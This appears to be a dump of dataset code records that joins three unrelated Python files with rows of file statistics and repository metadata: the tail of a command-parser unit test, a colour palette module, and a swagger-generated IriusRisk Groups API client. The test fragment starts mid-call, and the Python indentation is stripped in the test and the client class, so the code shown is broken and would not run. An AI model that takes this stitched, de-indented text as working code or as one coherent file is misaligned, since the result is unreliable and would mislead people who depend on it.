'command:name '
'{argument?* : The argument description.} '
'{--option=* : The option description.}'
)
self.assertEqual('command:name', results['name'])
self.assertEqual('argument', results['arguments'][0].get_name())
self.assertEqual('The argument description.', results['arguments'][0].get_description())
self.assertTrue(results['arguments'][0].is_list())
self.assertFalse(results['arguments'][0].is_required())
self.assertEqual('option', results['options'][0].get_name())
self.assertEqual('The option description.', results['options'][0].get_description())
self.assertTrue(results['options'][0].accept_value())
self.assertTrue(results['options'][0].is_list())
def test_shortcut_name_parsing(self):
results = Parser.parse('command:name {--o|option}')
self.assertEqual('command:name', results['name'])
self.assertEqual('option', results['options'][0].get_name())
self.assertEqual('o', results['options'][0].get_shortcut())
self.assertFalse(results['options'][0].accept_value())
results = Parser.parse('command:name {--o|option=}')
self.assertEqual('command:name', results['name'])
self.assertEqual('option', results['options'][0].get_name())
self.assertEqual('o', results['options'][0].get_shortcut())
self.assertTrue(results['options'][0].accept_value())
results = Parser.parse('command:name {--o|option=*}')
self.assertEqual('command:name', results['name'])
self.assertEqual('option', results['options'][0].get_name())
self.assertEqual('o', results['options'][0].get_shortcut())
self.assertTrue(results['options'][0].accept_value())
self.assertTrue(results['options'][0].is_list())
results = Parser.parse('command:name {--o|option=* : The option description.}')
self.assertEqual('command:name', results['name'])
self.assertEqual('option', results['options'][0].get_name())
self.assertEqual('o', results['options'][0].get_shortcut())
self.assertEqual('The option description.', results['options'][0].get_description())
self.assertTrue(results['options'][0].accept_value())
self.assertTrue(results['options'][0].is_list())
results = Parser.parse(
'command:name '
'{--o|option=* : The option description.}'
)
self.assertEqual('command:name', results['name'])
self.assertEqual('option', results['options'][0].get_name())
self.assertEqual('o', results['options'][0].get_shortcut())
self.assertEqual('The option description.', results['options'][0].get_description())
self.assertTrue(results['options'][0].accept_value())
self.assertTrue(results['options'][0].is_list())
def test_validator_parsing(self):
results = Parser.parse('command:name {argument (integer)} {--option (boolean) : Description with (parenthesis)}')
self.assertEqual('argument', results['arguments'][0].get_name())
self.assertEqual('option', results['options'][0].get_name())
self.assertIsInstance(results['arguments'][0].get_validator(), Integer)
self.assertIsInstance(results['options'][0].get_validator(), Boolean)
| 47.983333 | 129 | 0.644321 | 628 | 5,758 | 5.808917 | 0.071656 | 0.160362 | 0.152138 | 0.103618 | 0.912007 | 0.912007 | 0.89693 | 0.871985 | 0.871985 | 0.871985 | 0 | 0.011489 | 0.168635 | 5,758 | 119 | 130 | 48.386555 | 0.750574 | 0.003647 | 0 | 0.725275 | 0 | 0 | 0.249346 | 0 | 0 | 0 | 0 | 0 | 0.714286 | 1 | 0.032967 | false | 0 | 0.032967 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
23347bc02c7968eff67c9baae23219d11500e2b1 | 3,268 | py | Python | falsecolor2.py | surfline-jherndon/gifpal | 1b069ca61b02295de37bf460d86bb4a92b8e42f9 | [
"MIT"
] | null | null | null | falsecolor2.py | surfline-jherndon/gifpal | 1b069ca61b02295de37bf460d86bb4a92b8e42f9 | [
"MIT"
] | 1 | 2016-10-17T01:38:59.000Z | 2016-10-18T00:46:16.000Z | falsecolor2.py | surfline-jherndon/gifpal | 1b069ca61b02295de37bf460d86bb4a92b8e42f9 | [
"MIT"
] | null | null | null | def palette():
type = "list"
palette = [255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 255, 0, 255, 250, 0, 255, 250, 0, 255, 250, 0, 255, 250, 0, 255, 244, 0, 255, 244, 0, 255, 244, 0, 255, 244, 0, 255, 239, 0, 255, 239, 0, 255, 239, 0, 255, 239, 0, 255, 234, 0, 255, 234, 0, 255, 234, 0, 255, 228, 0, 255, 228, 0, 255, 223, 0, 255, 223, 0, 255, 223, 0, 255, 218, 0, 255, 218, 0, 255, 218, 0, 255, 218, 0, 255, 212, 0, 255, 212, 0, 255, 212, 0, 255, 212, 0, 255, 207, 0, 255, 207, 0, 255, 207, 0, 255, 207, 0, 255, 207, 0, 255, 201, 0, 255, 201, 0, 255, 201, 0, 255, 201, 0, 255, 196, 0, 255, 196, 0, 255, 196, 0, 255, 196, 0, 255, 196, 0, 255, 191, 0, 255, 191, 0, 255, 191, 0, 255, 191, 0, 255, 185, 0, 255, 185, 0, 255, 185, 0, 255, 185, 0, 255, 185, 0, 255, 180, 0, 255, 180, 0, 255, 180, 0, 255, 180, 0, 255, 175, 0, 255, 175, 0, 255, 175, 0, 255, 175, 0, 255, 175, 0, 255, 170, 0, 255, 170, 0, 255, 170, 0, 255, 170, 0, 255, 165, 0, 255, 165, 0, 255, 165, 0, 255, 165, 0, 255, 165, 0, 255, 160, 0, 255, 160, 0, 255, 160, 0, 255, 160, 0, 255, 155, 0, 255, 155, 0, 255, 155, 0, 255, 155, 0, 255, 155, 0, 255, 150, 0, 255, 150, 0, 255, 150, 0, 255, 150, 0, 255, 145, 0, 255, 145, 0, 255, 145, 0, 255, 145, 0, 255, 140, 0, 255, 140, 0, 255, 140, 0, 255, 140, 0, 255, 140, 0, 255, 135, 0, 255, 135, 0, 255, 135, 0, 255, 135, 0, 255, 130, 0, 255, 130, 0, 255, 130, 0, 255, 130, 0, 255, 130, 0, 255, 125, 0, 255, 125, 0, 255, 125, 0, 255, 125, 0, 255, 120, 0, 255, 120, 0, 255, 120, 0, 255, 120, 0, 255, 120, 0, 255, 115, 0, 255, 115, 0, 255, 115, 0, 255, 115, 0, 255, 110, 0, 255, 110, 0, 255, 110, 0, 255, 110, 0, 255, 110, 0, 255, 105, 0, 255, 105, 0, 255, 105, 0, 255, 105, 0, 255, 100, 0, 255, 100, 0, 255, 100, 0, 255, 100, 0, 255, 100, 0, 255, 95, 0, 255, 95, 0, 255, 95, 0, 255, 95, 0, 255, 90, 0, 255, 90, 0, 255, 90, 0, 255, 90, 0, 255, 90, 0, 255, 85, 0, 255, 85, 0, 255, 85, 0, 255, 85, 0, 255, 80, 0, 255, 80, 0, 255, 80, 0, 255, 80, 0, 255, 80, 0, 255, 75, 0, 255, 75, 0, 255, 75, 0, 255, 75, 0, 255, 70, 0, 255, 70, 0, 255, 70, 0, 255, 70, 0, 255, 70, 0, 255, 65, 0, 255, 65, 0, 255, 65, 0, 255, 65, 0, 255, 60, 0, 255, 60, 0, 255, 60, 0, 255, 60, 0, 255, 60, 0, 255, 55, 0, 255, 55, 0, 255, 55, 0, 255, 55, 0, 255, 50, 0, 255, 50, 0, 255, 50, 0, 255, 50, 0, 255, 50, 0, 255, 45, 0, 255, 45, 0, 255, 45, 0, 255, 45, 0, 255, 40, 0, 255, 40, 0, 255, 40, 0, 255, 40, 0, 255, 40, 0, 255, 35, 0, 255, 35, 0, 255, 35, 0, 255, 35, 0, 255, 30, 0, 255, 30, 0, 255, 30, 0, 255, 30, 0, 255, 30, 0, 255, 25, 0, 255, 25, 0, 255, 25, 0, 255, 25, 0, 255, 20, 0, 255, 20, 0, 255, 20, 0, 255, 20, 0, 255, 20, 0, 255, 15, 0, 255, 15, 0, 255, 15, 0, 255, 15, 0, 255, 10, 0, 255, 10, 0, 255, 10, 0, 255, 10, 0, 255, 10, 0, 255, 5, 0, 255, 5, 0, 255, 5, 0, 255, 5, 0, 255, 0, 0, 255, 0, 0, 255, 0, 0, 255, 0, 0, 255, 0, 0, 255, 0, 5, 255, 0, 5, 255, 0, 5, 255, 0, 5, 255, 0, 10, 255, 0, 10, 255, 0, 10, 255, 0, 10, 255, 0, 10, 255, 0, 15, 255, 0, 15, 255, 0, 15, 255, 0, 15, 255, 0, 20, 255, 0, 20, 255, 0, 20, 255, 0, 20, 255, 0, 20, 255, 0, 25, 255, 0, 25, 255, 0, 25, 255, 0, 25, 255, 0, 30, 255, 0, 30, 255]
return type, palette
| 408.5 | 3,212 | 0.522338 | 776 | 3,268 | 2.199742 | 0.072165 | 0.543644 | 0.061511 | 0.082015 | 0.968951 | 0.963093 | 0.963093 | 0.963093 | 0.938489 | 0.938489 | 0 | 0.67029 | 0.239902 | 3,268 | 7 | 3,213 | 466.857143 | 0.016908 | 0 | 0 | 0 | 0 | 0 | 0.001224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
88baaec873fa4795410c244a3a3c13800b2d3ba2 | 63,075 | py | Python | iriusrisk-python-client-lib/iriusrisk_python_client_lib/api/groups_api.py | iriusrisk/iriusrisk-python-client-lib | 4912706cd1e5c0bc555dbc7da02fb64cbeab3b18 | [
"Apache-2.0"
] | null | null | null | iriusrisk-python-client-lib/iriusrisk_python_client_lib/api/groups_api.py | iriusrisk/iriusrisk-python-client-lib | 4912706cd1e5c0bc555dbc7da02fb64cbeab3b18 | [
"Apache-2.0"
] | null | null | null | iriusrisk-python-client-lib/iriusrisk_python_client_lib/api/groups_api.py | iriusrisk/iriusrisk-python-client-lib | 4912706cd1e5c0bc555dbc7da02fb64cbeab3b18 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
IriusRisk API
Products API # noqa: E501
OpenAPI spec version: 1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from iriusrisk_python_client_lib.api_client import ApiClient
class GroupsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def groups_get(self, api_token, **kwargs): # noqa: E501
"""Gets a list of all Groups # noqa: E501
Gets a list of all user's groups. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_get(api_token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:return: list[Group]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_get_with_http_info(api_token, **kwargs) # noqa: E501
else:
(data) = self.groups_get_with_http_info(api_token, **kwargs) # noqa: E501
return data
def groups_get_with_http_info(self, api_token, **kwargs): # noqa: E501
"""Gets a list of all Groups # noqa: E501
Gets a list of all user's groups. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_get_with_http_info(api_token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:return: list[Group]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Group]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def groups_group_ref_delete(self, api_token, group_ref, **kwargs): # noqa: E501
"""Deletes a users group # noqa: E501
Deletes a users group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_ref_delete(api_token, group_ref, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group_ref: unique name of the group (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_group_ref_delete_with_http_info(api_token, group_ref, **kwargs) # noqa: E501
else:
(data) = self.groups_group_ref_delete_with_http_info(api_token, group_ref, **kwargs) # noqa: E501
return data
def groups_group_ref_delete_with_http_info(self, api_token, group_ref, **kwargs): # noqa: E501
"""Deletes a users group # noqa: E501
Deletes a users group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_ref_delete_with_http_info(api_token, group_ref, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group_ref: unique name of the group (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'group_ref'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_ref_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_group_ref_delete`") # noqa: E501
# verify the required parameter 'group_ref' is set
if ('group_ref' not in params or
params['group_ref'] is None):
raise ValueError("Missing the required parameter `group_ref` when calling `groups_group_ref_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_ref' in params:
path_params['groupRef'] = params['group_ref'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups/{groupRef}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def groups_group_ref_get(self, api_token, group_ref, **kwargs): # noqa: E501
"""Gets the group details. # noqa: E501
Returns the group details for the requested group. Conditions to be able to perform the action: - If the caller has the PRODUCTS_LIST_ALL permission then all groups can be queried without restriction. - Without the PRODUCTS_LIST_ALL permission, the call will only return the group if the caller belongs to that group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_ref_get(api_token, group_ref, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group_ref: unique name of the group (required)
:return: list[Group]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_group_ref_get_with_http_info(api_token, group_ref, **kwargs) # noqa: E501
else:
(data) = self.groups_group_ref_get_with_http_info(api_token, group_ref, **kwargs) # noqa: E501
return data
def groups_group_ref_get_with_http_info(self, api_token, group_ref, **kwargs): # noqa: E501
"""Gets the group details. # noqa: E501
Returns the group details for the requested group. Conditions to be able to perform the action: - If the caller has the PRODUCTS_LIST_ALL permission then all groups can be queried without restriction. - Without the PRODUCTS_LIST_ALL permission, the call will only return the group if the caller belongs to that group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_ref_get_with_http_info(api_token, group_ref, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group_ref: unique name of the group (required)
:return: list[Group]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'group_ref'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_ref_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_group_ref_get`") # noqa: E501
# verify the required parameter 'group_ref' is set
if ('group_ref' not in params or
params['group_ref'] is None):
raise ValueError("Missing the required parameter `group_ref` when calling `groups_group_ref_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_ref' in params:
path_params['groupRef'] = params['group_ref'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups/{groupRef}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Group]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def groups_group_ref_put(self, api_token, group_ref, update_group_request_body, **kwargs): # noqa: E501
"""Update a users group # noqa: E501
Updates a users group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_ref_put(api_token, group_ref, update_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group_ref: unique ref of the group (required)
:param UpdateGroupRequestBody update_group_request_body: JSON data that contains information of the fields (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_group_ref_put_with_http_info(api_token, group_ref, update_group_request_body, **kwargs) # noqa: E501
else:
(data) = self.groups_group_ref_put_with_http_info(api_token, group_ref, update_group_request_body, **kwargs) # noqa: E501
return data
def groups_group_ref_put_with_http_info(self, api_token, group_ref, update_group_request_body, **kwargs): # noqa: E501
"""Update a users group # noqa: E501
Updates a users group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_ref_put_with_http_info(api_token, group_ref, update_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group_ref: unique ref of the group (required)
:param UpdateGroupRequestBody update_group_request_body: JSON data that contains information of the fields (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'group_ref', 'update_group_request_body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_ref_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_group_ref_put`") # noqa: E501
# verify the required parameter 'group_ref' is set
if ('group_ref' not in params or
params['group_ref'] is None):
raise ValueError("Missing the required parameter `group_ref` when calling `groups_group_ref_put`") # noqa: E501
# verify the required parameter 'update_group_request_body' is set
if ('update_group_request_body' not in params or
params['update_group_request_body'] is None):
raise ValueError("Missing the required parameter `update_group_request_body` when calling `groups_group_ref_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group_ref' in params:
path_params['groupRef'] = params['group_ref'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'update_group_request_body' in params:
body_params = params['update_group_request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups/{groupRef}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Group', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def groups_group_users_delete(self, api_token, group, unassing_users_group_request_body, **kwargs): # noqa: E501
"""Unassign a list of users from a group # noqa: E501
Unassign a list of users from a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to unassign users from a group, **if you belong to this group**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_users_delete(api_token, group, unassing_users_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group: name of the group (required)
:param UnassingUsersGroupRequestBody unassing_users_group_request_body: JSON object that contains information to unassign users from group (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_group_users_delete_with_http_info(api_token, group, unassing_users_group_request_body, **kwargs) # noqa: E501
else:
(data) = self.groups_group_users_delete_with_http_info(api_token, group, unassing_users_group_request_body, **kwargs) # noqa: E501
return data
def groups_group_users_delete_with_http_info(self, api_token, group, unassing_users_group_request_body, **kwargs): # noqa: E501
"""Unassign a list of users from a group # noqa: E501
Unassign a list of users from a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to unassign users from a group, **if you belong to this group**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_users_delete_with_http_info(api_token, group, unassing_users_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group: name of the group (required)
:param UnassingUsersGroupRequestBody unassing_users_group_request_body: JSON object that contains information to unassign users from group (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'group', 'unassing_users_group_request_body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_users_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_group_users_delete`") # noqa: E501
# verify the required parameter 'group' is set
if ('group' not in params or
params['group'] is None):
raise ValueError("Missing the required parameter `group` when calling `groups_group_users_delete`") # noqa: E501
# verify the required parameter 'unassing_users_group_request_body' is set
if ('unassing_users_group_request_body' not in params or
params['unassing_users_group_request_body'] is None):
raise ValueError("Missing the required parameter `unassing_users_group_request_body` when calling `groups_group_users_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group' in params:
path_params['group'] = params['group'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'unassing_users_group_request_body' in params:
body_params = params['unassing_users_group_request_body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups/{group}/users', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def groups_group_users_get(self, api_token, group, **kwargs): # noqa: E501
"""List users from a group # noqa: E501
List users who belongs to a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to list users of a group, **if you belong to this group**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_users_get(api_token, group, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group: name of the group (required)
:return: list[User]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_group_users_get_with_http_info(api_token, group, **kwargs) # noqa: E501
else:
(data) = self.groups_group_users_get_with_http_info(api_token, group, **kwargs) # noqa: E501
return data
def groups_group_users_get_with_http_info(self, api_token, group, **kwargs): # noqa: E501
"""List users from a group # noqa: E501
List users who belongs to a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to list users of a group, **if you belong to this group**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_users_get_with_http_info(api_token, group, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group: name of the group (required)
:return: list[User]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_token', 'group'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method groups_group_users_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_token' is set
if ('api_token' not in params or
params['api_token'] is None):
raise ValueError("Missing the required parameter `api_token` when calling `groups_group_users_get`") # noqa: E501
# verify the required parameter 'group' is set
if ('group' not in params or
params['group'] is None):
raise ValueError("Missing the required parameter `group` when calling `groups_group_users_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'group' in params:
path_params['group'] = params['group'] # noqa: E501
query_params = []
header_params = {}
if 'api_token' in params:
header_params['api-token'] = params['api_token'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/groups/{group}/users', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[User]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def groups_group_users_put(self, api_token, group, assign_user_group_request_body, **kwargs): # noqa: E501
"""Assigns users to a group # noqa: E501
Assigns users to a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to assign users to a group, **if you belong to this group**. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.groups_group_users_put(api_token, group, assign_user_group_request_body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str api_token: Authentication token (required)
:param str group: name of the group (required)
:param AssignUserGroupRequestBody assign_user_group_request_body: JSON object that contains information to assign users to group (required)
:return: InlineResponse201
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.groups_group_users_put_with_http_info(api_token, group, assign_user_group_request_body, **kwargs) # noqa: E501
else:
(data) = self.groups_group_users_put_with_http_info(api_token, group, assign_user_group_request_body, **kwargs) # noqa: E501
return data
def groups_group_users_put_with_http_info(self, api_token, group, assign_user_group_request_body, **kwargs): # noqa: E501
"""Assigns users to a group # noqa: E501
Assigns users to a group. Conditions to be able to perform the action: - To have the permission **ALL_USERS_UPDATE** granted, or - To have the permission **MANAGE_USERS_BU** granted. With this permission you will be able to assign users to a group, **if you belong to this group**. # noqa: E501
